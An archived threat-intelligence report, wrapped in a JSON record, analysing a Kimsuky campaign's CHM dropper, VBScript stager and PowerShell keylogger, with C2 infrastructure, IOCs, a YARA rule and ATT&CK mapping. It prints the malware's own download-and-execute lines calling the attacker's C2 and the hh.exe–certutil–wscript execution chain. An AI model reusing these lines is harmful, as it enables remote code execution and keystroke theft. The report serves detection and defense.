{
	"id": "dd9622f1-71d9-49ef-8bd7-3b19ce311dd1",
	"created_at": "2026-05-06T02:02:57.208032Z",
	"updated_at": "2026-05-06T02:03:52.698639Z",
	"deleted_at": null,
	"sha1_hash": "02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3",
	"title": "We Dumped a Live Kimsuky C2 and Recovered Every Stage of the Kill Chain: CHM Dropper, VBScript Stager, PowerSh",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 172506,
	"plain_text": "We Dumped a Live Kimsuky C2 and Recovered Every Stage of the\r\nKill Chain: CHM Dropper, VBScript Stager, PowerSh\r\nBy Breakglass Intelligence\r\nPublished: 2026-04-11 · Archived: 2026-05-06 02:01:30 UTC\r\nTable of Contents\r\n#TL;DR\r\n#What this report adds to the public record\r\n#The Kill Chain\r\n#The C2 Server — Directory Listing Enabled\r\n#Stage 1: Reconnaissance + Persistence (6,338 bytes VBScript)\r\n#Stage 2: PowerShell Bridge (449 bytes VBScript)\r\n#Stage 3: Full Keylogger (6,234 bytes PowerShell)\r\n#Infrastructure: 79 Domains Across 5 IPs\r\n##The DAOU Staging Server (27.102.137.38 — 37 domains)\r\n##The Fast-Flux Farm (118.194.249.109 — 40 domains)\r\n##The Naver Phishing Farm (27.102.137.150 — 12+ domains, LIVE)\r\n#Related Kimsuky Sample\r\n#Detection Guidance\r\n##Network Signatures\r\n##Host Indicators\r\n##YARA\r\n#IOC Summary\r\n##File Hashes\r\n##Network IOCs\r\n##Host IOCs\r\n#MITRE ATT\u0026CK\r\n#Attribution\r\n#Methodology Disclaimer\r\nTL;DR\r\nOn April 11, 2026, researcher @smica83 submitted a CHM file ( api_reference.chm ) to MalwareBazaar tagged\r\n#Kimsuky . We picked it up and walked the infrastructure. The C2 server at check[.]nid-log[.]com had\r\ndirectory listing enabled and was serving payloads to anyone who asked. We recovered the complete source code\r\nof all three attack stages before the actor can rotate:\r\nStage 1 (6,338 bytes VBScript): Full system reconnaissance — OS, CPU, RAM, processes, AV products,\r\ndirectory listings of Desktop/Documents/Downloads — plus persistence via a scheduled task disguised as\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 1 of 11\n\n\"Edge Updater\"\r\nStage 2 (449 bytes VBScript → PowerShell): Bridge script that downloads and Invoke-Expression s the\r\nkeylogger\r\nStage 3 (6,234 bytes PowerShell): Complete keylogger with keystroke capture, clipboard monitoring,\r\nwindow tracking, and timed exfiltration using deliberately typo'd User-Agents ( Chremo instead of\r\nChrome, Edgo instead of Edge)\r\nThe C2 health check at /pc/index.php returns \"Million OK !!!!\" — the same signature Hunt.io documented on\r\nolder Kimsuky infrastructure in December 2024, except the actor has since upgraded from Apache 2.4.25\r\n(Win32) PHP 5.6.30 to Apache 2.4.58 (Win64) PHP 8.2.12. We found the old-generation server still alive on a\r\nseparate IP, both responding with \"Million OK !!!!\" — confirming infrastructure continuity.\r\nWe then mapped 79+ domains across 5 C2 IPs spanning Korean VPS resellers (DAOU Technology, UCloud HK,\r\nKaopu Cloud) and traced the infrastructure back to our previously published Kimsuky investigation — the C2\r\nstaging server at 27.102.137.38 sits in the same /16 subnet as 27.102.138.45 (the uncork[.]biz phishing\r\nnode from the udalyonka cluster), linking these two campaigns to the same operational cell.\r\nWhat this report adds to the public record\r\nAhnLab ASEC documented Kimsuky's shift from list.php to bootservice.php endpoints in April 2024, but\r\npublished only the endpoint names — not the actual payload source code. Hunt.io documented the \"Million OK\r\n!!!!\" health check and server fingerprint in December 2024, but on infrastructure that has since been upgraded.\r\nWhat our investigation adds:\r\n1. First public recovery of the complete payload source code for all three stages of the bootservice.php\r\nkill chain — recon, persistence, and keylogger\r\n2. Two previously undocumented C2 endpoints: checkservice.php (PowerShell stager delivery) and\r\nfinalservice.php (exfiltration receiver accepting multipart file uploads)\r\n3. Novel detection IOCs: Global\\AlreadyRunning19122345 mutex, Chremo / Edgo typo'd User-Agents,\r\nEdge Updater scheduled task, ----c2xkanZvaXU4OTA multipart boundary\r\n4. 79-domain infrastructure map — the most comprehensive public mapping of this Kimsuky DDNS\r\nphishing farm, including Korean NTS tax impersonation domains and Naver NID credential harvesting at\r\nscale\r\n5. Cross-campaign link connecting this CHM/bootservice cluster to our previously reported\r\nudalyonka/uncork.biz phishing operation via shared DAOU Technology subnet\r\n6. Server generation tracking — documenting the actor's upgrade from Win32/PHP 5.6 to Win64/PHP 8.2\r\nwhile preserving the \"Million OK !!!!\" beacon signature\r\nIf you've already published reporting on nid-log[.]com , the 130.94.29.111 cluster, or the bootservice.php\r\npayload source, please reply or DM — we'll update and credit.\r\nThe Kill Chain\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 2 of 11\n\nOn April 10, 2026, api_reference.chm (MD5: 0ac44ad9cfbc58ed76415f7bc79239f9 ) was submitted to\r\nMalwareBazaar by @smica83 (h/t @h2jazi for the original lead), tagged apt , chm , Kimsuky . Avast and AVG\r\nimmediately flagged it as VBS:Kimsuky-AH [Trj] . VirusTotal classified the campaign as downloader.kimsuky .\r\nThe CHM file disguises itself as API documentation. When a victim opens it, hh.exe renders the compiled\r\nHTML — which contains a hidden object that fires on click, triggering a three-stage LOLBin chain:\r\nhh.exe (opens CHM)\r\n └─\u003e powershell.exe -windowstyle hidden\r\n │ Writes base64 blob to %USERPROFILE%\\Links\\Link.dat\r\n └─\u003e certutil.exe -f -decode Link.dat Link.ini\r\n └─\u003e wscript.exe //b //e:vbscript Link.ini\r\n └─\u003e HTTP GET → check.nid-log[.]com/api/bootservice.php?tag=\u003crandom\u003e\u0026query=1\r\n └─\u003e Execute(responseText) ← fileless RCE\r\nThe tag parameter is a random 4-digit number (1–10000) for victim tracking. The query parameter selects\r\nwhich payload the server returns. The VBScript uses string concatenation obfuscation to evade static analysis:\r\nSet mx = CreateObject(\"Microsof\"\u0026\"t.XML\"\u0026\"HT\"\u0026\"TP\")\r\nmx.open \"GE\"\u0026\"T\", \"http://check.nid-log[.]com/api/bootservice.php?\"+\"tag=\"+rnd_num+\"\u0026query=1\", False\r\nmx.Send\r\nExecute(mx.responseText)\r\nNo file touches disk for the second-stage payload — it's fetched over HTTP and executed directly in memory via\r\nVBScript's Execute() .\r\nThe C2 Server — Directory Listing Enabled\r\nThe C2 at 130[.]94[.]29[.]111 runs Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 — a Windows box\r\nwith what appears to be a XAMPP-style deployment. Two ports are open: 80 (HTTP) and 3389 (RDP).\r\nThe actor left directory listing enabled at the web root:\r\nIndex of /\r\n /api/ 2023-11-15\r\n /pc/ 2023-11-15\r\nThe health check endpoint /pc/index.php returns:\r\nMillion OK !!!!\r\nThis is the same signature Hunt.io documented in December 2024 across a cluster of Kimsuky C2 servers. Their\r\ndocumented fingerprint was Apache/2.4.25 (Win32) PHP/5.6.30 on UCloud HK infrastructure. Ours is\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 3 of 11\n\nApache/2.4.58 (Win64) PHP/8.2.12 on LightNode (AS154177). Same operator, upgraded stack.\r\nWe confirmed this by finding the old-generation server still alive at 51[.]79[.]185[.]184 (OVH Canada), also\r\nreturning \"Million OK !!!!\" with the exact Apache/2.4.25 (Win32) PHP/5.6.30 fingerprint Hunt.io documented.\r\nBoth generations running simultaneously.\r\nOther interesting paths that returned 403 (present but access-restricted): /server-status , /server-info ,\r\n/.htaccess , /phpmyadmin/ .\r\nStage 1: Reconnaissance + Persistence (6,338 bytes VBScript)\r\nEndpoint: GET /api/bootservice.php?tag=\u003cID\u003e\u0026query=1\r\nThe server returns 6,338 bytes of VBScript that performs comprehensive system profiling:\r\nReconnaissance collected:\r\nComputer name, registered owner, manufacturer, model\r\nOS version and build number\r\nTotal physical memory, processor speed\r\nDirectory listings of: Desktop, Documents, Favorites, Recent, Startup, Program Files, Downloads\r\nFull process table: filename, ProcessID, SessionID (via Win32_Process )\r\nInstalled antivirus: display name, path, GUID, state (via SecurityCenter2\\AntiVirusProduct )\r\nPersistence planted:\r\nCreates a scheduled task named \"Edge Updater\" with a 60-minute interval ( PT60M )\r\nThe task executes wscript.exe //b //e:vbscript against a dropped .ini file\r\nThe .ini is placed in Shell.Application.NameSpace(32) (System folder) named\r\nOfficeUpdater_\u003cminute\u003e_\u003chour\u003e_\u003cday\u003e\u003cmonth\u003e.ini\r\nThe .ini file is a one-liner that fetches and Execute() s bootservice.php?query=6\r\nIE/Edge first-run customization is disabled to prevent popups\r\nExfiltration:\r\nAll recon data is Base64-encoded and POSTed as a multipart form to /api/finalservice.php\r\nMultipart boundary: ----c2xkanZvaXU4OTA\r\nUpload filename: Info.txt\r\nStage 2: PowerShell Bridge (449 bytes VBScript)\r\nEndpoint: GET /api/bootservice.php?tag=\u003cID\u003e\u0026query=6\r\nA lightweight 449-byte VBScript that bridges to PowerShell:\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 4 of 11\n\npowershell -command \"$base_url='http://check.nid-log[.]com/api';\r\n$rnd_num=[string](Get-Random -Minimum 1 -Maximum 10000);\r\n$url=$base_url+'/checkservice.php?idx=5\u0026tag='+$rnd_num;\r\nInvoke-Expression (Invoke-RestMethod $url);\r\nLogAction -ur $base_url\"\r\nThe LogAction function is defined in the code returned by checkservice.php — likely the exfiltration routine.\r\nStage 3: Full Keylogger (6,234 bytes PowerShell)\r\nEndpoint: GET /api/checkservice.php?idx=5\u0026tag=\u003cID\u003e\r\nThis is a complete keylogger with clipboard monitoring and timed exfiltration. Key capabilities:\r\nFeature Implementation\r\nKeystroke capture\r\nWin32 API: GetAsyncKeyState , GetKeyboardState , MapVirtualKey ,\r\nToUnicode\r\nWindow tracking Logs active window title changes with timestamps\r\nClipboard\r\nmonitoring\r\nPolls clipboard every 1 second for changes\r\nDuplicate prevention Mutex: Global\\AlreadyRunning19122345\r\nLog storage %APPDATA%\\Microsoft\\Windows\\Templates\\Office_Config.xml\r\nExfil interval Randomized 100–140 minutes\r\nExfil method Base64 → multipart POST to /api/finalservice.php , filename key\r\nUser-Agent (recon) Chremo/87.0.4280.141 — deliberate \"Chrome\" typo\r\nUser-Agent (keylog) Edgo/87.0.664.75 — deliberate \"Edge\" typo\r\nObfuscation API function names split into arrays and reassembled at runtime\r\nThe deliberate User-Agent typos ( Chremo , Edgo ) are a reliable detection signature — they won't match\r\nlegitimate browser traffic but avoid simple keyword blocking of \"Chrome\" or \"Edge\".\r\nInfrastructure: 79 Domains Across 5 IPs\r\nThe domain nid-log[.]com was registered on February 26, 2026 via Namecheap with Iceland privacy proxy\r\n(withheldforprivacy.com). A ZeroSSL certificate was issued the same day. Google MX and Site Verification were\r\nconfigured — likely for credential exfiltration via Google services.\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 5 of 11\n\nThe domain rotated through 5 IPs in 9 days:\r\nDate IP Provider Country Domains Status\r\nFeb 26 162.255.119.150 Namecheap parking US 2 Redirect\r\nFeb 26 38.60.220.135 Kaopu Cloud HK KR 2 Dead\r\nFeb 26 118.194.249.109 UCloud HK KR 40 Proxy up, backend dead\r\nMar 2 27.102.137.38 DAOU Technology KR 37 cPanel, C2 removed\r\nMar 7 130.94.29.111 LightNode Ltd US 2 LIVE — current C2\r\nThe pattern is clear: rotate to a new Korean VPS when detection scores climb, then move to a US-based provider\r\n(LightNode) to blend with Western traffic.\r\nThe DAOU Staging Server (27.102.137.38 — 37 domains)\r\nThis IP hosted the richest domain set, revealing the full campaign playbook:\r\nKorean NTS tax phishing: nid-tax[.]dns.army , tax-invoice[.]dns.army , pay-tax[.]dns.navy , ntax-doc[.]v6.rocks , miss-tax[.]dns.navy , k-invoice[.]v6.navy , and more\r\nNaver NID credential theft: nid-log[.]com , nid-log.electric-support[.]v6.rocks , nid-htl[.]duckdns.org , verify.efine-log[.]kro.kr\r\nDocument delivery lures: deliver-doc[.]v6.navy\r\nThis server sits at 27.102.137.38 — in the same DAOU Technology AS45996 allocation as 27.102.138.45 ,\r\nthe chk.uncork[.]biz phishing node from our previously published investigation of the udalyonka[.]com\r\nKimsuky phishing cluster. Same provider, same /16, same operational cell.\r\nThe Fast-Flux Farm (118.194.249.109 — 40 domains)\r\nForty domains with randomized 5-character subdomain prefixes across dns.army , dns.navy , and v6.navy —\r\na fast-flux C2 rotation pattern using 7 free DDNS providers: dynv6.net, dns.army, dns.navy, v6.rocks, v6.navy,\r\nduckdns.org, and kro.kr.\r\nThe Naver Phishing Farm (27.102.137.150 — 12+ domains, LIVE)\r\nA separate IP hosting mass-generated Naver credential phishing pages using No-IP DDNS with a nid-naver{3-\r\nletter-code} naming convention:\r\nnid-navertca.servehalflife[.]com (Apr 7)\r\nnid-naverfxc.servecounterstrike[.]com (Apr 4)\r\nnid-naverpep.servequake[.]com (Apr 1)\r\nnid-navercwu.servecounterstrike[.]com (Mar 20)\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 6 of 11\n\nAnd 8+ more dating back to March 2\r\nThis server runs the same Apache/2.4.58 (Win64) PHP/8.0.30 stack and implements an anti-bot JavaScript\r\nfilter — it sets a jsok=1 cookie and reloads, then checks additional conditions (likely geo-IP) before serving the\r\nphishing page. Only Korean visitors see the lure.\r\nThe MD5 4599ac1bbe483c73064df1353feafd01 referenced in AhnLab ASEC's April 2024 report is a CHM file\r\nnamed SecurityMail.chm with an identical kill chain — hh.exe → hidden PowerShell → certutil decode\r\n→ wscript Link.ini → Execute() . The same YARA rule ( CHM_File_Executes_JS_Via_PowerShell ) fires\r\non both samples. The difference: the older sample calls noreplymail[.]space/BitJoker/bootservice.php\r\ninstead of check.nid-log[.]com/api/bootservice.php . Same tooling, different C2. The sandbox also detected\r\nKorean locale geofencing ( ko-KR ) — the CHM checks the victim's language before proceeding.\r\nDetection Guidance\r\nNetwork Signatures\r\nHTTP requests to */bootservice.php?tag=*\u0026query=*\r\nHTTP requests to */checkservice.php?idx=*\r\nHTTP requests to */finalservice.php with multipart boundary ----c2xkanZvaXU4OTA\r\nHTTP responses containing Million OK !!!!\r\nUser-Agent strings containing Chremo/ or Edgo/\r\nHost Indicators\r\nScheduled task named Edge Updater with 60-minute interval\r\nFiles matching OfficeUpdater_*_*_*.ini in system directories\r\nMutex Global\\AlreadyRunning19122345\r\nFile creation at %APPDATA%\\Microsoft\\Windows\\Templates\\Office_Config.xml\r\nhh.exe spawning powershell.exe -windowstyle hidden followed by certutil.exe then\r\nwscript.exe\r\nYARA\r\nrule Kimsuky_Bootservice_CHM_Dropper {\r\n meta:\r\n description = \"Kimsuky CHM dropper delivering VBS stager via bootservice.php C2\"\r\n author = \"GHOST - Breakglass Intelligence\"\r\n date = \"2026-04-11\"\r\n reference = \"https://intel.breakglass.tech\"\r\n strings:\r\n $c2_1 = \"bootservice.php\" ascii wide\r\n $c2_2 = \"checkservice.php\" ascii wide\r\n $c2_3 = \"finalservice.php\" ascii wide\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 7 of 11\n\n$c2_4 = \"loggerservice.php\" ascii wide\r\n $drop = \"Links\\\\Link\" ascii wide\r\n $ole = \"Microsoft.XMLHTTP\" ascii wide\r\n $persist = \"OfficeUpdater\" ascii wide\r\n $mutex = \"AlreadyRunning19122345\" ascii wide\r\n $ua_1 = \"Chremo/\" ascii wide\r\n $ua_2 = \"Edgo/\" ascii wide\r\n condition:\r\n any of ($c2_*) and any of ($drop, $ole, $persist, $mutex, $ua_*)\r\n}\r\nIOC Summary\r\nFile Hashes\r\nHash File Detection\r\n1eff237dee95172363bfc0342d0389f809f753a6ec5e6848e57b3fd5482e9793 api_reference.chm 10/76\r\n85f8f8a3f28d2956776fbbd0365cdb78ac8dc1e6ed12818ef18caed0bb2f74c8 Link.ini 7/69\r\naf50f35701916d3909f2727cdcbde1a7af47f46eb8db3996905b1c0725aa133f\r\npayload_1.vbs\r\n(recon)\r\n8/76\r\nd7c09e7bf79aa9b786dcd9f870427f4a1110f702646fba9d3835215ad3649d0b\r\npayload_1.vbs (PS\r\nstager)\r\n3/76\r\na36576a096db24a1c91327eb547dedf52e5bd4b0d4593b88d9593d377585b922\r\nbootservice.php\r\nresponse\r\n0/62\r\nNetwork IOCs\r\nType Value Context\r\nDomain nid-log[.]com C2 apex\r\nDomain check[.]nid-log[.]com Active C2 subdomain\r\nIP 130[.]94[.]29[.]111 Current C2 (LightNode)\r\nIP 27[.]102[.]137[.]38 Staging server (DAOU, 37 domains)\r\nIP 118[.]194[.]249[.]109\r\nFast-flux farm (UCloud HK, 40\r\ndomains)\r\nIP 27[.]102[.]137[.]150 Live Naver phishing farm\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 8 of 11\n\nType Value Context\r\nIP 51[.]79[.]185[.]184 Old-gen C2, \"Million OK !!!!\"\r\nURL\r\nhttp://check[.]nid-log[.]com/api/bootservice.php\r\nPayload delivery\r\nURL\r\nhttp://check[.]nid-log[.]com/api/checkservice.php\r\nKeylogger delivery\r\nURL\r\nhttp://check[.]nid-log[.]com/api/finalservice.php\r\nExfil receiver\r\nHost IOCs\r\nType Value\r\nScheduled Task Edge Updater (PT60M)\r\nMutex Global\\AlreadyRunning19122345\r\nFile %USERPROFILE%\\Links\\Link.ini\r\nFile %APPDATA%\\...\\Templates\\Office_Config.xml\r\nFile OfficeUpdater_*_*_*.ini\r\nUser-Agent Chremo/87.0.4280.141\r\nUser-Agent Edgo/87.0.664.75\r\nMultipart Boundary ----c2xkanZvaXU4OTA\r\nMITRE ATT\u0026CK\r\nID Technique Evidence\r\nT1566.001 Phishing: Spearphishing Attachment CHM file delivered to target\r\nT1204.002 User Execution: Malicious File Victim opens api_reference.chm\r\nT1059.005 Command and Scripting: VBScript Link.ini, OfficeUpdater.ini\r\nT1059.001 Command and Scripting: PowerShell checkservice.php keylogger\r\nT1140 Deobfuscate/Decode Files certutil -f -decode\r\nT1053 Scheduled Task \"Edge Updater\" (60-min)\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 9 of 11\n\nID Technique Evidence\r\nT1036.005 Masquerading Task named after Edge browser\r\nT1082 System Information Discovery OS, CPU, RAM, manufacturer\r\nT1057 Process Discovery Full Win32_Process dump\r\nT1518.001 Security Software Discovery AV product enumeration\r\nT1083 File and Directory Discovery Desktop, Documents, Downloads\r\nT1056.001 Input Capture: Keylogging GetAsyncKeyState keylogger\r\nT1115 Clipboard Data Clipboard polling every 1s\r\nT1071.001 Web Protocols (HTTP) bootservice/checkservice/finalservice\r\nT1132.001 Data Encoding: Base64 Payload and exfil encoding\r\nT1041 Exfiltration Over C2 Multipart POST to finalservice.php\r\nAttribution\r\nKimsuky (APT43 / Velvet Chollima / Black Banshee) — DPRK — HIGH confidence\r\nAvast/AVG signature: VBS:Kimsuky-AH [Trj]\r\nVirusTotal classification: downloader.kimsuky\r\nThreatFox: nid-log[.]com tagged win.kimsuky (confidence 75, reporter Lenny_3BO)\r\nAhnLab ASEC: identical kill chain documented in April 2024 report\r\nTarget: South Korean Naver users (domain mimics nid.naver.com )\r\nXAMPP-on-Windows deployment preference matches documented Kimsuky operational patterns\r\nDAOU Technology hosting overlap with our previously published Kimsuky phishing investigation\r\nMethodology Disclaimer\r\nThis investigation employed passive intelligence collection (VirusTotal, crt.sh, WHOIS, DNS, certificate\r\ntransparency, Shodan InternetDB, URLScan, ThreatFox, MalwareBazaar) and active inspection of services\r\npublicly accessible without authentication. Where the C2 server returned payload content in response to HTTP\r\nGET requests without any authentication, that content was collected and analyzed. No destructive actions were\r\ntaken. No customer data was exfiltrated. No services were disrupted.\r\nGHOST — Breakglass Intelligence \"One indicator. Total infrastructure.\"\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 10 of 11\n\nSource: https://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nhttps://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://intel.breakglass.tech/post/kimsuky-chm-nidlog-c2-dump-full-payload-recovery"
	],
	"report_names": [
		"kimsuky-chm-nidlog-c2-dump-full-payload-recovery"
	],
	"threat_actors": [],
	"ts_created_at": 1778032977,
	"ts_updated_at": 1778033032,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3.pdf",
		"text": "https://archive.orkl.eu/02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3.txt",
		"img": "https://archive.orkl.eu/02e61990f3e053afd9e6aaa3b1a6fd466e46fbd3.jpg"
	}
}